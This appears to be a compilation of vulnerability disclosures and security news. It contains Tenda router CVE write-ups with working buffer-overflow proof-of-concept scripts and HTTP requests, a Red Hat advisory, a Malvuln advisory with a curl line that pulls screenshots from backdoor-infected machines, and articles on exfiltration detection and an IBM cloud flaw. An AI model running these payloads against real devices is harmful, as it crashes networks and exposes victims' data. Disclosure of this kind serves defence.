Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the wpapsk_crypto parameter in the fromSetWirelessRepeat function.

Permalink

Cannot retrieve contributors at this time

**Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the wpapsk\_crypto parameter in the fromSetWirelessRepeat function.****Description**

Tenda Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the httpd module when handling /goform/WifiExtraSet request.

**Firmware information**

*   Manufacturer's address: https://www.tenda.com.cn/
    
*   Firmware download address : https://www.tenda.com.cn/download/detail-2681.html
    

**Affected version**

**Vulnerability details**

This vulnerability lies in the /goform/WifiExtraSet page，The details are shown below:

**POC**

This POC can result in a Dos.

    POST /goform/WifiExtraSet HTTP/1.1
    Host: 192.168.204.133
    Content-Length: 247
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.204.133
    Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=iqb1qw; bLanguage=cn
    Connection: close
    
    wifi_chkHz=1&wl_mode=wisp&wl_enbale=1&country_code=CN&wpsEn=0&guestEn=0&iptvEn=0&wifiTimerEn=1&smartSaveEn=1&dmzEn=1&handset=0&ssid=fcniux&wpapsk_key=11111111&security=wpapsk&wpapsk_type=wpa&wpapsk_crypto=aaaaaaaaaaaaaaaaaaaaaaaaaaaa&mac=undifined

CVE-2022-45659: CVE-vulns/fromSetWirelessRepeat.md at main · Double-q1015/CVE-vulns

Tenda i21 V1.0.0.14(4656) is vulnerable to Buffer Overflow via /goform/setUplinkInfo.

Permalink

**Tenda i21 V1.0.0.14(4656) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address:https://www.tenda.com.cn/download/detail-2982.html
    

**Affected version**

**Vulnerability details**

In /goform/setUplinkInfo, pingHostIp1 is controlled by the user and will be spliced into auto\_ping\_ip by sprintf. It is worth noting that the size is not checked, resulting in a stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'upLinkEn=true&pingHostIp1=' + p1

p3 \= b"POST /goform/setUplinkInfo" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-44367: CVE-vulns/readme.md at main · Double-q1015/CVE-vulns

Tenda i21 V1.0.0.14(4656) is vulnerable to Buffer Overflow via /goform/setDiagnoseInfo.

Permalink

**Tenda i21 V1.0.0.14(4656) Heap overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address:https://www.tenda.com.cn/download/detail-2982.html
    

**Affected version**

**Vulnerability details**

In /goform/setDiagnoseInfo, a value of 0x50 is created, which will use strcpy to give the value after cmd + 5 to the heap. It is worth noting that the size is not checked, resulting in a heap overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'cmd=' + p1

p3 \= b"POST /goform/setDiagnoseInfo" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash

CVE-2022-44366: CVE-vulns/readme.md at main · Double-q1015/CVE-vulns

Tenda i21 V1.0.0.14(4656) has a stack overflow vulnerability via /goform/setSysPwd.

Permalink

Cannot retrieve contributors at this time

**Tenda i21 V1.0.0.14(4656) Dos vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address:https://www.tenda.com.cn/download/detail-2982.html
    

**Affected version**

**Vulnerability details**

In /goform/setSysPwd, when action is set to admin, the value of oldPwd will be base64 encoded and then passed to v3, and then v3 will be sent to encode\_pwd by strcpy. It is worth noting that the stack overflow vulnerability is caused by not checking the size.

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'action=admin&oldPwd=' + p1

p3 \= b"POST /goform/setSysPwd" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash

CVE-2022-44365: CVE-vulns/readme.md at main · Double-q1015/CVE-vulns

Tenda i21 V1.0.0.14(4656) is vulnerable to Buffer Overflow via /goform/setSnmpInfo.

Permalink

**Tenda i21 V1.0.0.14(4656) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address:https://www.tenda.com.cn/download/detail-2982.html
    

**Affected version**

**Vulnerability details**

In /goform/setSnmpInfo, snmpEn is controlled by the user and will finally be spliced into parm by sprintf. It is worth noting that the stack overflow is caused by not checking the size

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'snmpEn=' + p1

p3 \= b"POST /goform/setSnmpInfo" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-44363: CVE-vulns/readme.md at main · Double-q1015/CVE-vulns

Tenda i21 V1.0.0.14(4656) is vulnerable to Buffer Overflow via /goform/AddSysLogRule.

Permalink

**Tenda i21 V1.0.0.14(4656) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address:https://www.tenda.com.cn/download/detail-2982.html
    

**Affected version**

**Vulnerability details**

In /goform/AddSysLogRule, when the input op is add, you can input logip, logport, len, and finally these three will be spliced into mib\_value through sprintf. It is worth noting that these three do not check the size, resulting in stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'op=add&logip=' + p1

p3 \= b"POST /goform/AddSysLogRule" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-44362: CVE-vulns/readme.md at main · Double-q1015/CVE-vulns

Red Hat Security Advisory 2022-8750-01 - OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. Issues addressed include denial of service and out of bounds read vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Virtualization 4.11.1 security and bug fix update  
Advisory ID:       RHSA-2022:8750-01  
Product:           cnv  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8750  
Issue date:        2022-12-01  
CVE Names:         CVE-2015-20107 CVE-2016-3709 CVE-2020-0256  
                   CVE-2020-35525 CVE-2020-35527 CVE-2021-0308  
                   CVE-2021-38561 CVE-2022-0391 CVE-2022-0934  
                   CVE-2022-1292 CVE-2022-1304 CVE-2022-1586  
                   CVE-2022-1785 CVE-2022-1897 CVE-2022-1927  
                   CVE-2022-2068 CVE-2022-2097 CVE-2022-2509  
                   CVE-2022-3515 CVE-2022-22624 CVE-2022-22628  
                   CVE-2022-22629 CVE-2022-22662 CVE-2022-24675  
                   CVE-2022-24795 CVE-2022-24921 CVE-2022-25308  
                   CVE-2022-25309 CVE-2022-25310 CVE-2022-26700  
                   CVE-2022-26709 CVE-2022-26710 CVE-2022-26716  
                   CVE-2022-26717 CVE-2022-26719 CVE-2022-27404  
                   CVE-2022-27405 CVE-2022-27406 CVE-2022-28327  
                   CVE-2022-29154 CVE-2022-30293 CVE-2022-30629  
                   CVE-2022-30698 CVE-2022-30699 CVE-2022-32206  
                   CVE-2022-32208 CVE-2022-34903 CVE-2022-37434  
                   CVE-2022-38177 CVE-2022-38178 CVE-2022-40674  
====================================================================  
1. Summary:

Red Hat OpenShift Virtualization release 4.11.1 is now available with  
updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

OpenShift Virtualization is Red Hat's virtualization solution designed for  
Red Hat OpenShift Container Platform.

Security Fix(es):

* golang: out-of-bounds read in golang.org/x/text/language leads to DoS  
(CVE-2021-38561)

* golang: encoding/pem: fix stack overflow in Decode (CVE-2022-24675)

* golang: regexp: stack exhaustion via a deeply nested expression  
(CVE-2022-24921)

* golang: crypto/elliptic: panic caused by oversized scalar  
(CVE-2022-28327)

* golang: crypto/tls: session tickets lack random ticket_age_add  
(CVE-2022-30629)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Cloning a Block DV to VM with Filesystem with not big enough size comes  
to endless loop - using pvc api (BZ#2033191)

* Restart of VM Pod causes SSH keys to be regenerated within VM  
(BZ#2087177)

* Import gzipped raw file causes image to be downloaded and uncompressed to  
TMPDIR (BZ#2089391)

* [4.11] VM Snapshot Restore hangs indefinitely when backed by a  
snapshotclass (BZ#2098225)

* Fedora version in DataImportCrons is not 'latest' (BZ#2102694)

* [4.11] Cloned VM's snapshot restore fails if the source VM disk is  
deleted (BZ#2109407)

* CNV introduces a compliance check fail in "ocp4-moderate" profile -  
routes-protected-by-tls (BZ#2110562)

* Nightly build: v4.11.0-578: index format was changed in 4.11 to  
file-based instead of sqlite-based (BZ#2112643)

* Unable to start windows VMs on PSI setups (BZ#2115371)

* [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity  
restricted:v1.24 (BZ#2128997)

* Mark Windows 11 as TechPreview (BZ#2129013)

* 4.11.1 rpms (BZ#2139453)

This advisory contains the following OpenShift Virtualization 4.11.1  
images.

RHEL-8-CNV-4.11

virt-cdi-operator-container-v4.11.1-5  
virt-cdi-uploadserver-container-v4.11.1-5  
virt-cdi-apiserver-container-v4.11.1-5  
virt-cdi-importer-container-v4.11.1-5  
virt-cdi-controller-container-v4.11.1-5  
virt-cdi-cloner-container-v4.11.1-5  
virt-cdi-uploadproxy-container-v4.11.1-5  
checkup-framework-container-v4.11.1-3  
kubevirt-tekton-tasks-wait-for-vmi-status-container-v4.11.1-7  
kubevirt-tekton-tasks-create-datavolume-container-v4.11.1-7  
kubevirt-template-validator-container-v4.11.1-4  
virt-handler-container-v4.11.1-5  
hostpath-provisioner-operator-container-v4.11.1-4  
virt-api-container-v4.11.1-5  
vm-network-latency-checkup-container-v4.11.1-3  
cluster-network-addons-operator-container-v4.11.1-5  
virtio-win-container-v4.11.1-4  
virt-launcher-container-v4.11.1-5  
ovs-cni-marker-container-v4.11.1-5  
hyperconverged-cluster-webhook-container-v4.11.1-7  
virt-controller-container-v4.11.1-5  
virt-artifacts-server-container-v4.11.1-5  
kubevirt-tekton-tasks-modify-vm-template-container-v4.11.1-7  
kubevirt-tekton-tasks-disk-virt-customize-container-v4.11.1-7  
libguestfs-tools-container-v4.11.1-5  
hostpath-provisioner-container-v4.11.1-4  
kubevirt-tekton-tasks-disk-virt-sysprep-container-v4.11.1-7  
kubevirt-tekton-tasks-copy-template-container-v4.11.1-7  
cnv-containernetworking-plugins-container-v4.11.1-5  
bridge-marker-container-v4.11.1-5  
virt-operator-container-v4.11.1-5  
hostpath-csi-driver-container-v4.11.1-4  
kubevirt-tekton-tasks-create-vm-from-template-container-v4.11.1-7  
kubemacpool-container-v4.11.1-5  
hyperconverged-cluster-operator-container-v4.11.1-7  
kubevirt-ssp-operator-container-v4.11.1-4  
ovs-cni-plugin-container-v4.11.1-5  
kubevirt-tekton-tasks-cleanup-vm-container-v4.11.1-7  
kubevirt-tekton-tasks-operator-container-v4.11.1-2  
cnv-must-gather-container-v4.11.1-8  
kubevirt-console-plugin-container-v4.11.1-9  
hco-bundle-registry-container-v4.11.1-49

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2033191 - Cloning a Block DV to VM with Filesystem with not big enough size comes to endless loop - using pvc api  
2064857 - CVE-2022-24921 golang: regexp: stack exhaustion via a deeply nested expression  
2070772 - When specifying pciAddress for several SR-IOV NIC they are not correctly propagated to libvirt XML  
2077688 - CVE-2022-24675 golang: encoding/pem: fix stack overflow in Decode  
2077689 - CVE-2022-28327 golang: crypto/elliptic: panic caused by oversized scalar  
2087177 - Restart of VM Pod causes SSH keys to be regenerated within VM  
2089391 - Import gzipped raw file causes image to be downloaded and uncompressed to TMPDIR  
2091856 - ?Edit BootSource? action should have more explicit information when disabled  
2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add  
2098225 - [4.11] VM Snapshot Restore hangs indefinitely when backed by a snapshotclass  
2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS  
2102694 - Fedora version in DataImportCrons is not 'latest'  
2109407 - [4.11] Cloned VM's snapshot restore fails if the source VM disk is deleted  
2110562 - CNV introduces a compliance check fail in "ocp4-moderate" profile - routes-protected-by-tls  
2112643 - Nightly build: v4.11.0-578: index format was changed in 4.11 to file-based instead of sqlite-based  
2115371 - Unable to start windows VMs on PSI setups  
2119613 - GiB changes to B in Template's Edit boot source reference modal  
2128554 - The storageclass of VM disk is different from quick created and customize created after changed the default storageclass  
2128872 - [4.11]Can't restore cloned VM  
2128997 - [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24  
2129013 - Mark Windows 11 as TechPreview  
2129235 - [RFE] Add "Copy SSH command" to VM action list  
2134668 - Cannot edit ssh even vm is stopped  
2139453 - 4.11.1 rpms

5. References:

https://access.redhat.com/security/cve/CVE-2015-20107  
https://access.redhat.com/security/cve/CVE-2016-3709  
https://access.redhat.com/security/cve/CVE-2020-0256  
https://access.redhat.com/security/cve/CVE-2020-35525  
https://access.redhat.com/security/cve/CVE-2020-35527  
https://access.redhat.com/security/cve/CVE-2021-0308  
https://access.redhat.com/security/cve/CVE-2021-38561  
https://access.redhat.com/security/cve/CVE-2022-0391  
https://access.redhat.com/security/cve/CVE-2022-0934  
https://access.redhat.com/security/cve/CVE-2022-1292  
https://access.redhat.com/security/cve/CVE-2022-1304  
https://access.redhat.com/security/cve/CVE-2022-1586  
https://access.redhat.com/security/cve/CVE-2022-1785  
https://access.redhat.com/security/cve/CVE-2022-1897  
https://access.redhat.com/security/cve/CVE-2022-1927  
https://access.redhat.com/security/cve/CVE-2022-2068  
https://access.redhat.com/security/cve/CVE-2022-2097  
https://access.redhat.com/security/cve/CVE-2022-2509  
https://access.redhat.com/security/cve/CVE-2022-3515  
https://access.redhat.com/security/cve/CVE-2022-22624  
https://access.redhat.com/security/cve/CVE-2022-22628  
https://access.redhat.com/security/cve/CVE-2022-22629  
https://access.redhat.com/security/cve/CVE-2022-22662  
https://access.redhat.com/security/cve/CVE-2022-24675  
https://access.redhat.com/security/cve/CVE-2022-24795  
https://access.redhat.com/security/cve/CVE-2022-24921  
https://access.redhat.com/security/cve/CVE-2022-25308  
https://access.redhat.com/security/cve/CVE-2022-25309  
https://access.redhat.com/security/cve/CVE-2022-25310  
https://access.redhat.com/security/cve/CVE-2022-26700  
https://access.redhat.com/security/cve/CVE-2022-26709  
https://access.redhat.com/security/cve/CVE-2022-26710  
https://access.redhat.com/security/cve/CVE-2022-26716  
https://access.redhat.com/security/cve/CVE-2022-26717  
https://access.redhat.com/security/cve/CVE-2022-26719  
https://access.redhat.com/security/cve/CVE-2022-27404  
https://access.redhat.com/security/cve/CVE-2022-27405  
https://access.redhat.com/security/cve/CVE-2022-27406  
https://access.redhat.com/security/cve/CVE-2022-28327  
https://access.redhat.com/security/cve/CVE-2022-29154  
https://access.redhat.com/security/cve/CVE-2022-30293  
https://access.redhat.com/security/cve/CVE-2022-30629  
https://access.redhat.com/security/cve/CVE-2022-30698  
https://access.redhat.com/security/cve/CVE-2022-30699  
https://access.redhat.com/security/cve/CVE-2022-32206  
https://access.redhat.com/security/cve/CVE-2022-32208  
https://access.redhat.com/security/cve/CVE-2022-34903  
https://access.redhat.com/security/cve/CVE-2022-37434  
https://access.redhat.com/security/cve/CVE-2022-38177  
https://access.redhat.com/security/cve/CVE-2022-38178  
https://access.redhat.com/security/cve/CVE-2022-40674  
https://access.redhat.com/security/updates/classification/#moderate

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY4lNCdzjgjWX9erEAQhXxhAAjaag4e7jIpQLpc0kJhc/hn59M4UIxn8v  
a1L+lD58IrBfY3KAtSAK0t3ei92Lyf8LCJqm027yGlIskeCV91vkO9ZpJhPfRasU  
u1a8Uhd/5F6caB0xUPX26vyCyksalw17CNmLWh5wd2izhkOGctkgVD7LhsVzXbFh  
tIomeVp/hVwW9ILX03ijss27E6m2ZUczgWmuNpviqW8WRFMUw3ZM+1MxnSDHxURe  
H28dsj2l7nrshdBGrZeuj2HBoA0/x3Vsc2jiXfP8nt7LcQ/pb1DN4MYo6lAAEVkC  
O2LlzTAzw/3MAGofaRinyHZD2aoqicPqooUIQglBbF6cvYAUrMtxRCwKcZOckE3d  
F2exKjihBY3JeLlsjpWXBe0yAhdwse7j0oovNL2uQH1imUr7Y1pXVlJqeDzHkzME  
MIRKzuuTGJe1D9Av4S8R+W5eT7iXBAH7x9Lia1NFxeflemVQbyr8ayEMLcmiDuyj  
xMKYFFpW9GmplZlCnDaG5lxKu8ZbOkRzanaLeLn+G5j1+1w9Y9wGtlXJIHV6gmfC  
Wk33MBCpqCGg1Wz+SlXJCtksnYmvKdzn79b2HInvPJtndDQ/VidcN2MuJfkYe688  
2m3FYMI0ehPummvv3iGXLz5ku6gD6y0qNhNWC6HM+hLNnPvvukXXcFgCyonJuv0I  
AqwDoKa8myM=pIHc  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8750-01

Backdoor.Win32.Delf.gj malware suffers from an information leakage vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/8872c2ec49ff3382240762a029631684.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnBackup media: infosec.exchange/@malvulnThreat: Backdoor.Win32.Delf.gjVulnerability: Information DisclosureDescription: The malware listens on TCP port 80. Third-party adversaries who can reach an infected system can pass "netscreen.jpg" for the User-agent: header in the HTTP request to download victim machines screen captures.Family: DelfType: PE32MD5: 8872c2ec49ff3382240762a029631684Vuln ID: MVID-2022-0663Disclosure: 12/01/2022Exploit/PoC:curl http://x.x.x.x -H "User-agent: netscreen.jpg" --output screendump.jpg  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                 Dload  Upload   Total   Spent    Left  Speed100  215k  100  215k    0     0   215k      0  0:00:01 --:--:--  0:00:01 1976kDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Delf.gj MVID-2022-0663 Information Disclosure

A do-it-yourself machine-learning system helped a French bank detect three types of exfiltration attacks missed by current rules-based systems, attendees will learn at Black Hat Europe.

Using an internally developed machine-learning model trained on log data, the information security team for a French bank found it could detect three new types of data exfiltration that rules-based security appliances did not catch.

Carole Boijaud, a cybersecurity engineer with Credit Agricole Group Infrastructure Platform (CA-GIP), will take the stage at next week's Black Hat Europe 2022 conference to detail the research into the technique, in a session entitled, "Thresholds Are for Old Threats: Demystifying AI and Machine Learning to Enhance SOC Detection." The team took daily summary data from log files, extracted interesting features from the data, and used that to find anomalies in the bank's Web traffic. 

The research focused on how to better detect data exfiltration by attackers, and resulted in identification of attacks that the company's previous system failed to detect, she says.  

"We implemented our own simulation of threats, of what we wanted to see, so we were able to see what could identify in our own traffic," she says. "When we didn't detect \[a specific threat\], we tried to figure out what is different, and we tried to understand what was going on."

As machine learning has become a buzzword in the cybersecurity industry, some companies and academic researchers are still making headway in experimenting with their own data to find threats that might otherwise hide in the noise. Microsoft, for example, used data collected from the telemetry of 400,000 customers to identify specific attack groups and, using those classifications, predict future actions of the attackers. Other firms are using machine-learning techniques, such as genetic algorithms, to help detect accounts on cloud computing platforms that have too many permissions.

There are a variety of benefits from analyzing your own data with a homegrown system, says Boijaud. Security operation centers (SOCs) gain a better understanding of their network traffic and user activity, and security analysts can gain more insight into the threats attacking their systems. While Credit Agricole has its own platform group to manage infrastructure, handle security, and conduct research, even smaller enterprises can benefit from applying machine learning and data analysis, Boijaud says.

"Developing your own model is not that expensive and I'm convinced that everyone can do it," she says. "If you have access to the data, and you have people who know the logs, they can create their own pipeline, at least in the beginning."

**Finding the Right Data Points to Monitor**

The cybersecurity engineering team used a data-analysis technique known as clustering to identify the most important features to track in their analysis. Among the features that were deemed most significant included the popularity of domains, the number of times systems reached out to specific domains, and whether the request used an IP address or a standard domain name.

"Based on the representation of the data and the fact that we have been monitoring the daily behavior of the machines, we have been able to identify those features," says Boijaud. "Machine learning is about mathematics and models, but one of the important facts is how you choose to represent the data and that requires understanding the data and that means we need people, like cybersecurity engineers, who understand this field."

After selecting the features that are most significant in classifications, the team used a technique known as "isolation forest" to find the outliers in the data. The isolation forest algorithm organizes data into several logical trees based on their values, and then analyzes the trees to determine the characteristics of outliers. The approach scales easily to handle a large number of features and is relatively light, processing-wise.

The initial efforts resulted in the model learning to detect three types of exfiltration attacks that the company would not otherwise have detected with existing security appliances. Overall, about half the exfiltration attacks could be detected with a low false-positive rate, Boijaud says.

**Not All Network Anomalies Are Malicious**

The engineers also had to find ways to determine what anomalies indicated malicious attacks and what may be nonhuman — but benign — traffic. Advertising tags and requests sent to third-party tracking servers were also caught by the system, as they tend to match the definitions of anomalies, but could be filtered out of the final results.

Automating the initial analysis of security events can help companies more quickly triage and identify potential attacks. By doing the research themselves, security teams gain additional insight into their data and can more easily determine what is an attack and what may be benign, Boijaud says.

CCA-GIP plans to expand the analysis approach to use cases beyond detecting exfiltration using Web attacks, she says.

SOC Turns to Homegrown Machine Learning to Catch Cyber-Intruders

IBM has fixed a high-severity security vulnerability affecting its Cloud Databases (ICD) for PostgreSQL product that could be potentially exploited to tamper with internal repositories and run unauthorized code.
The privilege escalation flaw (CVSS score: 8.8), dubbed "Hell's Keychain" by cloud security firm Wiz, has been described as a "first-of-its-kind supply-chain attack vector impacting a

Kubernetes / Cloud Security

IBM has fixed a high-severity security vulnerability affecting its Cloud Databases (ICD) for PostgreSQL product that could be potentially exploited to tamper with internal repositories and run unauthorized code.

The privilege escalation flaw (CVSS score: 8.8), dubbed "**Hell's Keychain**" by cloud security firm Wiz, has been described as a "first-of-its-kind supply-chain attack vector impacting a cloud provider's infrastructure."

Successful exploitation of the bug could enable a malicious actor to remotely execute code in customers' environments and even read or modify data stored in the PostgreSQL database.

"The vulnerability consists of a chain of three exposed secrets (Kubernetes service account token, private container registry password, CI/CD server credentials) coupled with overly permissive network access to internal build servers," Wiz researchers Ronen Shustin and Shir Tamari said.

Hell's Keychain commences with an SQL injection flaw in ICD that grants an attacker superuser (aka "ibm") privileges, which is then used to execute arbitrary commands on the underlying virtual machine hosting the database instance.

This capability is weaponized to access a Kubernetes API token file, allowing for broader post-exploitation efforts that involve pulling container images from IBM's private container registry, which stores images related to ICD for PostgreSQL, and scanning those images for additional secrets.

"Container images typically hold proprietary source code and binary artifacts that are the company's intellectual property," the researchers explained. "They can also contain information that an attacker could leverage to find additional vulnerabilities and perform lateral movement within the service's internal environment."

Wiz said it was able to extract internal artifact repository and FTP credentials from the image manifest files, effectively permitting unfettered read-write access to trusted repositories and IBM build servers.

An attack of this kind could have severe ramifications, as it enables the adversary to overwrite arbitrary files that are used in the build process of the PostgreSQL image, which would then be installed on every database instance.

The American technology giant, in an independent advisory, said that all IBM Cloud Databases for PostgreSQL instances were potentially impacted by the bug, but noted that it found no evidence of malicious activity.

It further stated that the fixes have been automatically applied to customer instances and that no further action is required. The mitigations were rolled out on August 22 and September 3, 2022.

"These vulnerabilities could have been exploited by a malicious actor as part of an extensive exploit chain culminating in a supply-chain attack on the platform," the researchers said.

